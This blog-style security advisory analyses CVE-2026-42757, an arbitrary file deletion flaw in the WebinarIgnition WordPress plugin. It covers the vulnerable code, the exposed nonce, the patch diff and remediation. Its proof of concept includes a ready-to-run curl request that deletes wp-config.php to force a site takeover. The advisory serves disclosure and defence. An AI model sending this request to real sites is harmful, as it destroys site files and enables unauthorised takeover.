WebinarIgnition WordPress plugin banner

CVE-2026-42757: WebinarIgnition Arbitrary File Deletion (CVSS 8.1)

Updated 7 min read

CVE-2026-42757 is a CVSS 8.1 High Arbitrary File Deletion vulnerability in the WebinarIgnition – Live, Automated & Evergreen Webinar System also for WooCommerce WordPress plugin. An authenticated attacker with only Subscriber-level access can delete any file on the server. Deleting a critical file such as wp-config.php forces WordPress into installation mode, enabling a complete site takeover.

Vulnerability Summary

FieldValue
Plugin NameWebinarIgnition – Live, Automated & Evergreen Webinar System also for WooCommerce
Plugin Slugwebinar-ignition
CVE IDCVE-2026-42757
CVSS Score8.1 (High)
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
Vulnerability TypeAuthenticated (Subscriber+) Arbitrary File Deletion
Affected Versions< 4.08.253
Patched Version4.08.253
PublishedMay 30, 2026
Researcherhhhai
Wordfence AdvisoryLink

Description

The WebinarIgnition plugin is vulnerable to arbitrary file deletion due to insufficient file path validation in its CSV import feature. An authenticated attacker with Subscriber-level access can supply any file path as the file parameter in an AJAX request. The server reads the file and then deletes it without checking that the path stays within the uploads directory. This can easily lead to remote code execution when critical files like wp-config.php are deleted, forcing WordPress back into setup mode.

Technical Analysis

Vulnerable AJAX Endpoint

The plugin registers two AJAX actions for its CSV import feature in inc/callback.php:

// Step 1: Upload and preview a CSV file
add_action( 'wp_ajax_reh_wi_handle_csv_preview', 'reh_wi_handle_csv_preview_callback' );

// Step 2: Map columns and import the CSV — vulnerable function
add_action( 'wp_ajax_reh_wi_handle_csv_upload_mapped', 'webinarignition_reh_wi_handle_csv_upload_mapped_callback' );

Both actions use only the wp_ajax_ prefix (not wp_ajax_nopriv_), so WordPress requires the caller to be logged in. However, neither action checks the caller’s role or capabilities.

Missing Authorization Check

The webinarignition_reh_wi_handle_csv_upload_mapped_callback() function only verifies a nonce. It has no current_user_can() call:

// inc/callback.php (line 3087)
function webinarignition_reh_wi_handle_csv_upload_mapped_callback() {
    if ( !wp_verify_nonce( sanitize_text_field( $_POST['security'] ?? '' ), 'webinarignition_ajax_nonce' ) ) {
        wp_send_json_error( 'Invalid security token' );
    }
    // No capability check here — any logged-in user continues past this point

    $app_id     = (int) sanitize_text_field( $_POST['id'] );
    $webinar_data = WebinarignitionManager::webinarignition_get_webinar_data( $app_id );
    // ...
    $target_path = sanitize_text_field( $_POST['file'] ?? '' ); // user-controlled path

sanitize_text_field() strips HTML and extra whitespace but does not restrict file paths. An attacker can pass /var/www/html/wp-config.php and it passes this check unchanged.

Nonce Accessible to Any Subscriber

A nonce check only prevents CSRF — it does not confirm who the logged-in user is. Because the nonce webinarignition_ajax_nonce is embedded in every webinar registration page, any logged-in subscriber can read it from the page source:

// inc/class.WebinarignitionPowerupsShortcodes.php (line 745)
$window_security = "window.wiRegJS.ajax_nonce = '" . wp_create_nonce( 'webinarignition_ajax_nonce' ) . "'";

// And also via wp_localize_script (line 757)
wp_localize_script( 'webinarignition_registration_js', 'wiRegJS', array(
    'ajax_nonce' => wp_create_nonce( 'webinarignition_ajax_nonce' ),
) );

Any subscriber who visits a webinar registration page while logged in can open the browser console and type wiRegJS.ajax_nonce to retrieve a valid nonce.

Unvalidated File Deletion

After reading and processing the file as CSV, the function deletes the file at the caller-supplied path:

// inc/callback.php (line 3174)
if ( file_exists( $target_path ) ) {
    wp_delete_file( $target_path );
}
wp_send_json_success( [
    'data' => $csv_array,
] );

There is no check that $target_path is inside the uploads directory or that the file extension is .csv. Any readable file the web server process owns can be deleted.

Execution Path Summary

  1. Attacker logs in as a Subscriber
  2. Visits any page containing the [wi_webinar_block] shortcode
  3. Reads wiRegJS.ajax_nonce from the browser console (or page source)
  4. Sends a POST request to wp-admin/admin-ajax.php with action=reh_wi_handle_csv_upload_mapped, the nonce, a valid webinar ID, and file=/absolute/path/to/target
  5. The server reads the file, processes it as CSV, and then deletes it

Proof of Concept

Disclaimer: This proof of concept is provided for educational purposes only. Test only on systems you own or have explicit written permission to test.

Prerequisites:

  • WordPress site running WebinarIgnition version < 4.08.253
  • Attacker has a Subscriber-level account (or user registration is open)
  • At least one webinar exists (to obtain a valid webinar ID)
  • A page with the [wi_webinar_block] shortcode is publicly accessible

Step 1 — Obtain the nonce

Log in as a Subscriber. Visit any webinar registration page. Open the browser console and run:

console.log(wiRegJS.ajax_nonce);

Copy the nonce value (a 10-character alphanumeric string).

Step 2 — Find a valid webinar ID

The webinar ID appears in the shortcode (id attribute) or in the URL of the webinar admin page. For example, if the admin URL includes post=42, the webinar ID is 42.

Step 3 — Delete an arbitrary file

Replace <TARGET>, <NONCE>, <WEBINAR_ID>, and the cookie with your values:

curl -s -X POST "https://<TARGET>/wp-admin/admin-ajax.php" \
  --cookie "wordpress_logged_in_XXXX=<SUBSCRIBER_SESSION_COOKIE>" \
  --data-urlencode "action=reh_wi_handle_csv_upload_mapped" \
  --data-urlencode "security=<NONCE>" \
  --data-urlencode "id=<WEBINAR_ID>" \
  --data-urlencode "file=/var/www/html/wp-config.php" \
  --data-urlencode "mapping[email]=email"

A successful response looks like:

{"success":true,"data":{"data":[]}}

Step 4 — Verify the deletion

curl -s "https://<TARGET>/" | grep -i "error establishing\|WordPress › Installation"

If wp-config.php was deleted, WordPress displays a database error or the installation wizard, allowing an attacker to reconfigure the database and take full control.

Patch Analysis

Version 4.08.253 introduced two new helper functions in inc/callback.php:

+function webinarignition_reh_wi_current_user_can_import_csv() {
+    return current_user_can( 'manage_options' );
+}
+
+function webinarignition_reh_wi_validate_csv_import_file_path( $target_path ) {
+    if ( empty( $target_path ) ) {
+        return false;
+    }
+    $real_target_path = realpath( $target_path );
+    if ( false === $real_target_path || !is_file( $real_target_path ) ) {
+        return false;
+    }
+    $uploads = wp_upload_dir();
+    $real_upload_base = realpath( $uploads['basedir'] );
+    $normalized_target = wp_normalize_path( $real_target_path );
+    $normalized_base   = trailingslashit( wp_normalize_path( $real_upload_base ) );
+    if ( 0 !== strpos( $normalized_target, $normalized_base ) ) {
+        return false;
+    }
+    if ( 'csv' !== strtolower( pathinfo( $normalized_target, PATHINFO_EXTENSION ) ) ) {
+        return false;
+    }
+    return $normalized_target;
+}

Both AJAX handlers now call these functions immediately after the nonce check:

 function webinarignition_reh_wi_handle_csv_upload_mapped_callback() {
     if ( !wp_verify_nonce( ... ) ) { wp_send_json_error( ... ); }
+    if ( !webinarignition_reh_wi_current_user_can_import_csv() ) {
+        wp_send_json_error( [ 'message' => 'Insufficient permissions.' ], 403 );
+    }
     // ...
-    $target_path = sanitize_text_field( $_POST['file'] ?? '' );
+    $target_path = webinarignition_reh_wi_validate_csv_import_file_path(
+        sanitize_text_field( wp_unslash( $_POST['file'] ?? '' ) )
+    );
+    if ( empty( $target_path ) ) {
+        wp_send_json_error( [ 'message' => 'Invalid CSV file path.' ], 400 );
+    }

The fix addresses the root cause in two ways:

  1. Authorization: Only users with manage_options (Administrators) can call the CSV import endpoint.
  2. Path validation: realpath() resolves symlinks, then the code checks that the resolved path starts with the WordPress uploads base directory and ends with a .csv extension. This prevents path traversal attacks.

Timeline

DateEvent
May 30, 2026Vulnerability published; patch released (version 4.08.253)
June 2, 2026Wordfence advisory last updated
June 7, 2026This blog post published

Remediation

Update WebinarIgnition to version 4.08.253 or later from the WordPress admin dashboard under Plugins → Installed Plugins, or download directly from wordpress.org.

If an immediate update is not possible:

  • Restrict file system write permissions so the web server process cannot delete critical WordPress files
  • Disable user registration to prevent new subscriber accounts until the patch is applied

References

  1. Wordfence Advisory — CVE-2026-42757
  2. Patchstack Advisory
  3. WordPress.org Plugin Repository
  4. CVE-2026-42757 on cve.org
  5. Trac Changeset
Share this post: X / Twitter LinkedIn

If you found this post helpful, consider buying me a coffee. It keeps me writing!

Buy Me A Coffee